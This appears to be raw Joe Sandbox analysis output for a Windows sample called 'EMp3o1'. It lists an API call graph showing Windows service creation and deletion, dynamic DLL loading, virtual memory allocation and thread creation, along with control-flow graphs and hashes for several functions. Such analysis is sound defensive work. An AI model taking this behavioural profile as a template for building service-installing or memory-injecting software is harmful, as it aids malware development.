140009320 _lock 14018->14022 14019 140009330 14019->13969 14020 1400094dc GetStdHandle 14020->14019 14021 1400094ef 14020->14021 14021->14019 14023 1400094f5 WriteFile 14021->14023 14022->14019 14022->14020 14024 140009375 _lock 14022->14024 14023->14019 14024->14019 14025 1400093b9 GetModuleFileNameA 14024->14025 14026 1400093d9 _lock 14025->14026 14138 14000f000 14026->14138 14030 140008543 ExitProcess 14029->14030 14031 14000852a GetProcAddress 14029->14031 14031->14030 14032 14000853f 14031->14032 14032->14030 14034 14000a334 14033->14034 14035 14000a339 HeapSetInformation 14033->14035 14034->13974 14035->13974 14164 140008370 14036->14164 14038 140005c48 14038->13991 14049 1400084e0 14038->14049 14039 14000a1c4 GetStdHandle 14048 14000a17c 14039->14048 14040 140008370 3 API calls 14045 140009f8a 14040->14045 14041 14000a239 SetHandleCount 14041->14038 14042 14000a1d8 GetFileType 14042->14048 14043 14000a0e3 14043->14038 14044 14000a11c GetFileType 14043->14044 14043->14048 14169 14000edc0 14043->14169 14044->14043 14045->14038 14045->14040 14045->14043 14045->14045 14045->14048 14047 14000edc0 _lock 3 API calls 14047->14048 14048->14038 14048->14039 14048->14041 14048->14042 14048->14047 14050 140009540 _lock 12 API calls 14049->14050 14051 1400084ed 14050->14051 14052 140009300 _lock 10 API calls 14051->14052 14053 1400084f4 14052->14053 14054 1400073e0 _lock LdrLoadDll 14053->14054 14055 140008500 14054->14055 14057 140009e7c 14056->14057 14058 140009e3e GetCommandLineW 14056->14058 14061 140009e81 GetCommandLineW 14057->14061 14062 140009e69 14057->14062 14059 140009e49 GetCommandLineW 14058->14059 14060 140009e5e GetLastError 14058->14060 14059->14060 14060->14062 14063 140009e75 14060->14063 14061->14062 14062->14063 14064 140009e91 GetCommandLineA MultiByteToWideChar 14062->14064 14063->13994 14065 140009ec8 14064->14065 14066 140009ed9 14064->14066 14065->13994 14067 140008370 3 API calls 14066->14067 14068 140009eeb 14067->14068 14069 140009f32 14068->14069 14070 140009ef3 MultiByteToWideChar 14068->14070 14069->13994 14071 140009f13 14070->14071 14072 140009f2a 14070->14072 14071->13994 14183 140008de0 14072->14183 14075 140009c52 GetEnvironmentStringsW 14074->14075 14076 140009c86 14074->14076 14077 140009c6c GetLastError 14075->14077 14083 140009c60 14075->14083 14078 140009c91 GetEnvironmentStringsW 14076->14078 14079 140009c77 14076->14079 14077->14076 14077->14079 14081 140005c67 14078->14081 14078->14083 14080 140009d09 GetEnvironmentStrings 14079->14080 14079->14081 14080->14081 14082 140009d17 14080->14082 14100 1400099c0 GetModuleFileNameW 14081->14100 14084 140009d58 14082->14084 14086 140009d20 MultiByteToWideChar 14082->14086 14083->14083 14188 140008300 14083->14188 14087 140008370 3 API calls 14084->14087 14086->14081 14086->14082 14089 140009d68 14087->14089 14092 140009d7d 14089->14092 14093 140009d70 FreeEnvironmentStringsA 14089->14093 14090 140009ce1 __SehTransFilter 14094 140009cef FreeEnvironmentStringsW 14090->14094 14091 140009cd1 FreeEnvironmentStringsW 14091->14081 14095 140009de5 FreeEnvironmentStringsA 14092->14095 14096 140009d90 MultiByteToWideChar 14092->14096 14093->14081 14094->14081 14095->14081 14096->14092 14097 140009e0e 14096->14097 14098 140008de0 _lock 2 API calls 14097->14098 14099 140009e16 FreeEnvironmentStringsA 14098->14099 14099->14081 14103 140009a03 14100->14103 14101 140008300 _lock 17 API calls 14102 140009bca 14101->14102 14102->13998 14103->14101 14103->14102 14105 1400096b2 14104->14105 14106 1400096a8 14104->14106 14107 140008370 3 API calls 14105->14107 14106->14002 14115 1400096fa 14107->14115 14108 140009709 14108->14002 14109 1400097a5 14110 140008de0 _lock 2 API calls 14109->14110 14111 1400097b4 14110->14111 14111->14002 14112 140008370 3 API calls 14112->14115 14113 1400097e5 14114 140008de0 _lock 2 API calls 14113->14114 14114->14111 14115->14108 14115->14109 14115->14112 14115->14113 14117 140008666 14116->14117 14119 1400086bf 14117->14119 14204 140005380 14117->14204 14119->14006 14121 140001565 14120->14121 14122 140001569 14121->14122 14125 14000157e 14121->14125 14242 140001430 GetModuleFileNameW OpenSCManagerW 14122->14242 14126 140001595 OpenSCManagerW 14125->14126 14127 14000164f 14125->14127 14130 1400015b2 GetLastError 14126->14130 14131 1400015cf OpenServiceW 14126->14131 14128 140001654 14127->14128 14129 140001669 StartServiceCtrlDispatcherW 14127->14129 14251 1400011f0 14128->14251 14129->13973 14130->13973 14132 140001611 DeleteService 14131->14132 14133 1400015e9 GetLastError CloseServiceHandle 14131->14133 14135 140001626 CloseServiceHandle CloseServiceHandle 14132->14135 14136 14000161e GetLastError 14132->14136 14133->13973 14135->13973 14136->14135 14139 14000f01e __SehTransFilter 14138->14139 14140 14000f03b LoadLibraryA 14139->14140 14141 14000f125 _lock 14139->14141 14142 14000f054 GetProcAddress 14140->14142 14143 1400094c9 14140->14143 14156 14000f165 14141->14156 14161 1400073e0 LdrLoadDll 14141->14161 14142->14143 14144 14000f06d _lock 14142->14144 14143->13969 14148 14000f075 GetProcAddress 14144->14148 14146 1400073e0 _lock LdrLoadDll 14146->14143 14147 1400073e0 _lock LdrLoadDll 14153 14000f1e9 14147->14153 14150 140007220 _lock 14148->14150 14152 14000f094 GetProcAddress 14150->14152 14151 1400073e0 _lock LdrLoadDll 14151->14156 14155 14000f0b3 _lock 14152->14155 14154 1400073e0 _lock LdrLoadDll 14153->14154 14157 14000f1a3 _lock 14153->14157 14154->14157 14155->14141 14158 14000f0e9 GetProcAddress 14155->14158 14156->14147 14156->14157 14157->14146 14159 14000f101 _lock 14158->14159 14159->14141 14160 14000f10d GetProcAddress 14159->14160 14160->14141 14162 140007333 14161->14162 14162->14161 14163 140007403 14162->14163 14163->14151 14165 1400083a0 14164->14165 14167 1400083e0 14165->14167 14168 1400083be Sleep 14165->14168 14175 14000e850 14165->14175 14167->14045 14168->14165 14168->14167 14170 1400073e0 _lock LdrLoadDll 14169->14170 14172 14000edec _lock 14170->14172 14171 14000ee1d _lock 14171->14043 14172->14171 14173 14000ee26 GetModuleHandleA 14172->14173 14173->14171 14174 14000ee38 GetProcAddress 14173->14174 14174->14171 14176 14000e865 14175->14176 14177 14000e8be HeapAlloc 14176->14177 14179 14000e876 sprintf_s 14176->14179 14180 1400090b0 14176->14180 14177->14176 14177->14179 14179->14165 14181 1400073e0 _lock LdrLoadDll 14180->14181 14182 1400090c5 14181->14182 14182->14176 14184 140008de9 HeapFree 14183->14184 14185 140008e19 _lock 14183->14185 14184->14185 14186 140008dff sprintf_s 14184->14186 14185->14069 14187 140008e09 GetLastError 14186->14187 14187->14185 14190 140008320 14188->14190 14191 140008358 14190->14191 14192 140008338 Sleep 14190->14192 14193 1400090f0 14190->14193 14191->14090 14191->14091 14192->14190 14192->14191 14194 140009103 14193->14194 14195 14000919e 14193->14195 14198 14000914c HeapAlloc 14194->14198 14199 140009540 _lock 12 API calls 14194->14199 14200 140009300 _lock 10 API calls 14194->14200 14201 1400090b0 _lock LdrLoadDll 14194->14201 14202 140008510 _lock 3 API calls 14194->14202 14203 140009173 sprintf_s 14194->14203 14196 1400090b0 _lock LdrLoadDll 14195->14196 14197 1400091a3 sprintf_s 14196->14197 14197->14190 14198->14194 14198->14203 14199->14194 14200->14194 14201->14194 14202->14194 14203->14190 14207 140005250 14204->14207 14206 140005389 14206->14119 14208 140005271 14207->14208 14209 1400073e0 _lock LdrLoadDll 14208->14209 14210 14000527e 14209->14210 14211 1400073e0 _lock LdrLoadDll 14210->14211 14212 14000528d 14211->14212 14216 1400052f0 _lock 14212->14216 14219 140008490 14212->14219 14214 1400052b5 14215 1400052d9 14214->14215 14214->14216 14222 140008400 14214->14222 14215->14216 14218 140008400 7 API calls 14215->14218 14216->14206 14218->14216 14220 1400084c5 HeapSize 14219->14220 14221 140008499 sprintf_s 14219->14221 14221->14214 14224 140008430 14222->14224 14225 140008472 14224->14225 14226 140008450 Sleep 14224->14226 14227 14000e920 14224->14227 14225->14215 14226->14224 14226->14225 14228 14000e935 14227->14228 14229 14000e94c 14228->14229 14238 14000e95e 14228->14238 14231 140008de0 _lock 2 API calls 14229->14231 14230 14000e9b1 14233 1400090b0 _lock LdrLoadDll 14230->14233 14234 14000e951 14231->14234 14232 14000e973 HeapReAlloc 14232->14238 14241 14000e9b9 _lock sprintf_s 14232->14241 14233->14241 14234->14224 14235 14000e9f4 sprintf_s 14237 14000e9f9 GetLastError 14235->14237 14236 1400090b0 _lock LdrLoadDll 14236->14238 14237->14241 14238->14230 14238->14232 14238->14235 14238->14236 14239 14000e9db sprintf_s 14238->14239 14240 14000e9e0 GetLastError 14239->14240 14240->14241 14241->14224 14243 140001482 CreateServiceW 14242->14243 14244 14000147a GetLastError 14242->14244 14246 1400014ea GetLastError 14243->14246 14247 1400014df CloseServiceHandle 14243->14247 14245 1400014fd 14244->14245 14257 140004f30 14245->14257 14248 1400014f2 CloseServiceHandle 14246->14248 14247->14248 14248->14245 14250 14000150d 14250->13973 14252 1400011fa 14251->14252 14266 1400051d0 14252->14266 14255 140004f30 sprintf_s NtAllocateVirtualMemory 14256 140001262 14255->14256 14256->13973 14259 140004f39 __SehTransFilter 14257->14259 14258 140004f44 14258->14250 14259->14258 14262 140006c95 14259->14262 14261 14000660e sprintf_s 14261->14250 14264 140006d9d 14262->14264 14265 140006d7b 14262->14265 14263 140006f95 NtAllocateVirtualMemory 14263->14264 14264->14261 14265->14263 14265->14264 14269 140008270 14266->14269 14268 140001238 MessageBoxW 14268->14255 14270 14000827e 14269->14270 14272 1400082ac sprintf_s 14269->14272 14270->14272 14273 140008120 14270->14273 14272->14268 14274 14000816a 14273->14274 14275 14000813b sprintf_s 14273->14275 14274->14275 14277 1400081d7 14274->14277 14279 140007f50 14274->14279 14275->14272 14277->14275 14278 140007f50 sprintf_s 54 API calls 14277->14278 14278->14275 14287 140007f69 sprintf_s 14279->14287 14280 140007f74 sprintf_s 14280->14277 14281 14000801d 14282 1400080d5 14281->14282 14283 14000802f 14281->14283 14284 14000cc00 sprintf_s 54 API calls 14282->14284 14285 14000804c 14283->14285 14289 140008081 14283->14289 14288 140008056 14284->14288 14295 14000cc00 14285->14295 14287->14280 14287->14281 14292 14000cd50 14287->14292 14288->14277 14289->14288 14303 14000c2a0 14289->14303 14293 140008300 _lock 17 API calls 14292->14293 14294 14000cd6a 14293->14294 14294->14281 14296 14000cc3f 14295->14296 14298 14000cc23 sprintf_s 14295->14298 14296->14298 14311 14000fc50 14296->14311 14298->14288 14301 14000ccc5 sprintf_s 14356 14000fd20 LeaveCriticalSection 14301->14356 14304 14000c2e0 14303->14304 14310 14000c2c3 sprintf_s 14303->14310 14305 14000fc50 sprintf_s 25 API calls 14304->14305 14304->14310 14306 14000c34e 14305->14306 14307 14000c1f0 sprintf_s 2 API calls 14306->14307 14308 14000c367 sprintf_s 14306->14308 14307->14308 14390 14000fd20 LeaveCriticalSection 14308->14390 14310->14288 14312 14000fc96 14311->14312 14313 14000fccb 14311->14313 14357 14000b400 14312->14357 14315 14000ccac 14313->14315 14316 14000fccf EnterCriticalSection 14313->14316 14315->14301 14321 14000c3f0 14315->14321 14316->14315 14324 14000c42e 14321->14324 14326 14000c427 sprintf_s 14321->14326 14322 140004f30 sprintf_s NtAllocateVirtualMemory 14323 14000cbe6 14322->14323 14323->14301 14324->14326 14327 14000c4fb sprintf_s __SehTransFilter 14324->14327 14384 14000c1f0 14324->14384 14326->14322 14331 14000c526 GetConsoleMode 14327->14331 14333 14000c841 14327->14333 14328 14000c86a 14330 14000c936 14328->14330 14338 14000c876 14328->14338 14329 14000cb20 WriteFile 14329->14326 14332 14000cb53 GetLastError 14329->14332 14337 14000c940 14330->14337 14346 14000ca02 14330->14346 14331->14333 14334 14000c557 14331->14334 14332->14326 14333->14328 14333->14329 14334->14333 14335 14000c564 GetConsoleCP 14334->14335 14335->14326 14351 14000c581 sprintf_s 14335->14351 14336 14000c8c5 WriteFile 14336->14338 14339 14000c928 GetLastError 14336->14339 14337->14326 14341 14000c991 WriteFile 14337->14341 14338->14326 14338->14336 14339->14326 14340 14000ca57 WideCharToMultiByte 14342 14000cb15 GetLastError 14340->14342 14340->14346 14341->14337 14343 14000c9f4 GetLastError 14341->14343 14342->14326 14343->14326 14344 14000cab0 WriteFile 14345 14000caf6 GetLastError 14344->14345 14344->14346 14345->14326 14345->14346 14346->14326 14346->14340 14346->14344 14347 14000fd50 7 API calls sprintf_s 14347->14351 14348 14000c649 WideCharToMultiByte 14348->14326 14349 14000c68c WriteFile 14348->14349 14349->14351 14352 14000c80d GetLastError 14349->14352 14350 14000c829 GetLastError 14350->14326 14351->14326 14351->14347 14351->14348 14351->14350 14353 14000c6e2 WriteFile 14351->14353 14355 14000c81b GetLastError 14351->14355 14352->14326 14353->14351 14354 14000c7ff GetLastError 14353->14354 14354->14326 14355->14326 14358 14000b41e 14357->14358 14359 14000b42f EnterCriticalSection 14357->14359 14363 14000b2f0 14358->14363 14361 14000b423 14361->14359 14362 1400084e0 _lock 12 API calls 14361->14362 14362->14359 14364 14000b317 14363->14364 14365 14000b32e 14363->14365 14366 140009540 _lock 12 API calls 14364->14366 14367 140008300 _lock 17 API calls 14365->14367 14372 14000b342 sprintf_s 14365->14372 14368 14000b31c 14366->14368 14369 14000b350 14367->14369 14370 140009300 _lock 10 API calls 14368->14370 14369->14372 14374 14000b400 _lock 22 API calls 14369->14374 14371 14000b324 14370->14371 14373 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14371->14373 14372->14361 14373->14365 14375 14000b371 14374->14375 14376 14000b3a7 14375->14376 14377 14000b379 14375->14377 14378 140008de0 _lock HeapFree GetLastError 14376->14378 14379 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14377->14379 14383 14000b392 sprintf_s 14378->14383 14380 14000b386 14379->14380 14382 140008de0 _lock HeapFree GetLastError 14380->14382 14380->14383 14381 14000b3b0 LeaveCriticalSection 14381->14372 14382->14383 14383->14381 14385 14000c20c sprintf_s 14384->14385 14386 14000c212 sprintf_s 14385->14386 14387 14000c22c SetFilePointer 14385->14387 14386->14327 14388 14000c24a GetLastError 14387->14388 14389 14000c254 sprintf_s 14387->14389 14388->14389 14389->14327 13956 140006c95 13958 140006d9d 13956->13958 13959 140006d7b 13956->13959 13957 140006f95 NtAllocateVirtualMemory 13957->13958 13959->13957 13959->13958 14391 1400054e0 14392 14000552c 14391->14392 14395 140005506 sprintf_s 14391->14395 14404 1400074d0 14392->14404 14396 140008370 3 API calls 14399 140005545 __SehTransFilter 14396->14399 14397 1400055b8 14398 140008de0 _lock 2 API calls 14397->14398 14401 1400055c0 sprintf_s 14398->14401 14399->14397 14408 1400074f0 14399->14408 14401->14395 14403 1400055b0 GetLastError 14403->14397 14406 140007333 14404->14406 14405 140005536 14405->14396 14406->14405 14407 1400073e0 LdrLoadDll 14406->14407 14407->14406 14410 140007333 14408->14410 14409 140005561 CreateThread 14409->14401 14409->14403 14410->14409 14411 1400073e0 LdrLoadDll 14410->14411 14411->14410

                                                Executed Functions

                                                Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 159 140006fdc-140007020 155->159 156->132 160 140006f37-140006f7a 157->160 158->160 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 165 140007039-140007058 161->165 166 14000705a-140007062 161->166 162->151 163->162 165->161 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                                Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: File$CreateReadmalloc
                                                • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                • API String ID: 3950102678-3381721293
                                                • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                Function 00007FFDAC081C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 25 7ffdac081c00-7ffdac081c06 26 7ffdac081c41-7ffdac081c4b 25->26 27 7ffdac081c08-7ffdac081c0b 25->27 30 7ffdac081d68-7ffdac081d7d 26->30 28 7ffdac081c0d-7ffdac081c10 27->28 29 7ffdac081c35-7ffdac081c74 call 7ffdac082470 27->29 31 7ffdac081c12-7ffdac081c15 28->31 32 7ffdac081c28 __scrt_dllmain_crt_thread_attach 28->32 45 7ffdac081d42 29->45 46 7ffdac081c7a-7ffdac081c8f call 7ffdac082304 29->46 33 7ffdac081d7f 30->33 34 7ffdac081d8c-7ffdac081da6 call 7ffdac082304 30->34 36 7ffdac081c21-7ffdac081c26 call 7ffdac0823b4 31->36 37 7ffdac081c17-7ffdac081c20 31->37 40 7ffdac081c2d-7ffdac081c34 32->40 38 7ffdac081d81-7ffdac081d8b 33->38 48 7ffdac081ddb-7ffdac081e0c call 7ffdac082630 34->48 49 7ffdac081da8-7ffdac081dd9 call 7ffdac08242c call 7ffdac0822d4 call 7ffdac0827b4 call 7ffdac0825d0 call 7ffdac0825f4 call 7ffdac08245c 34->49 36->40 50 7ffdac081d44-7ffdac081d59 45->50 57 7ffdac081d5a-7ffdac081d67 call 7ffdac082630 46->57 58 7ffdac081c95-7ffdac081ca6 call 7ffdac082374 46->58 59 7ffdac081e0e-7ffdac081e14 48->59 60 7ffdac081e1d-7ffdac081e23 48->60 49->38 57->30 77 7ffdac081ca8-7ffdac081ccc call 7ffdac082778 call 7ffdac0822c4 call 7ffdac0822e8 call 7ffdac087b10 58->77 78 7ffdac081cf7-7ffdac081d01 call 7ffdac0825d0 58->78 59->60 64 7ffdac081e16-7ffdac081e18 59->64 65 7ffdac081e65-7ffdac081e6d call 7ffdac081720 60->65 66 7ffdac081e25-7ffdac081e2f 60->66 72 7ffdac081f02-7ffdac081f0f 64->72 79 7ffdac081e72-7ffdac081e7b 65->79 73 7ffdac081e31-7ffdac081e34 66->73 74 7ffdac081e36-7ffdac081e3c 66->74 75 7ffdac081e3e-7ffdac081e44 73->75 74->75 82 7ffdac081e4a-7ffdac081e5f call 7ffdac081c00 75->82 83 7ffdac081ef8-7ffdac081f00 75->83 77->78 126 7ffdac081cce-7ffdac081cd5 __scrt_dllmain_after_initialize_c 77->126 78->45 99 7ffdac081d03-7ffdac081d0f call 7ffdac082620 78->99 86 7ffdac081eb3-7ffdac081eb5 79->86 87 7ffdac081e7d-7ffdac081e7f 79->87 82->65 82->83 83->72 89 7ffdac081ebc-7ffdac081ed1 call 7ffdac081c00 86->89 90 7ffdac081eb7-7ffdac081eba 86->90 87->86 94 7ffdac081e81-7ffdac081ea3 call 7ffdac081720 call 7ffdac081d68 87->94 89->83 108 7ffdac081ed3-7ffdac081edd 89->108 90->83 90->89 94->86 119 7ffdac081ea5-7ffdac081eaa 94->119 115 7ffdac081d11-7ffdac081d1b call 7ffdac082538 99->115 116 7ffdac081d35-7ffdac081d40 99->116 113 7ffdac081ee4-7ffdac081ef2 108->113 114 7ffdac081edf-7ffdac081ee2 108->114 120 7ffdac081ef4 113->120 114->120 115->116 127 7ffdac081d1d-7ffdac081d2b 115->127 116->50 119->86 120->83 126->78 128 7ffdac081cd7-7ffdac081cf4 call 7ffdac087acc 126->128 127->116 128->78
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                • Instruction ID: a88c03ec6f5a3843c6c2ee121b543a86e3ac25708fb450e34b736c60c6a0aca1
                                                • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                • Instruction Fuzzy Hash: 8381BE20F0E2438AFA749B2594712793290AFA57E0F04C435EA0D57793DF3CE865A75C
                                                Function 00007FFDAC081720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                • String ID: WordpadFilter.db
                                                • API String ID: 868324331-3647581008
                                                • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                • Instruction ID: f08704542a4217c303a605d2e4413939a3a346744d1987f2237f607647503f11
                                                • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                • Instruction Fuzzy Hash: 83317C32B1AB4189E710CFA1D8503AD73A5EB99798F148535EE8C13B46EF38D561C788
                                                Function 00007FFDAC0811B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 196 7ffdac0811b0-7ffdac081207 197 7ffdac08124b-7ffdac08124e 196->197 198 7ffdac081209-7ffdac081222 call 7ffdac091490 196->198 200 7ffdac081254-7ffdac081280 197->200 201 7ffdac0814b8-7ffdac0814bf 197->201 207 7ffdac081224-7ffdac081227 198->207 208 7ffdac08123e 198->208 204 7ffdac081282-7ffdac08128f 200->204 205 7ffdac0812f6-7ffdac081335 call 7ffdac081b90 call 7ffdac090a50 200->205 202 7ffdac0814c3-7ffdac0814ea call 7ffdac081b70 201->202 210 7ffdac0814f1-7ffdac0814f6 call 7ffdac081a40 204->210 211 7ffdac081295-7ffdac08129c 204->211 233 7ffdac081340-7ffdac0813cb 205->233 213 7ffdac081241-7ffdac081246 207->213 214 7ffdac081229-7ffdac08123c call 7ffdac091490 207->214 208->213 224 7ffdac0814f7-7ffdac0814ff call 7ffdac081110 210->224 217 7ffdac08129e-7ffdac0812a5 211->217 218 7ffdac0812c7-7ffdac0812cf call 7ffdac081b90 211->218 213->197 214->207 214->208 223 7ffdac0812ab-7ffdac0812b3 call 7ffdac081b90 217->223 217->224 231 7ffdac0812d2-7ffdac0812f1 call 7ffdac090e10 218->231 234 7ffdac0814eb-7ffdac0814f0 call 7ffdac0879cc 223->234 235 7ffdac0812b9-7ffdac0812c5 223->235 231->205 233->233 237 7ffdac0813d1-7ffdac0813da 233->237 234->210 235->231 238 7ffdac0813e0-7ffdac081402 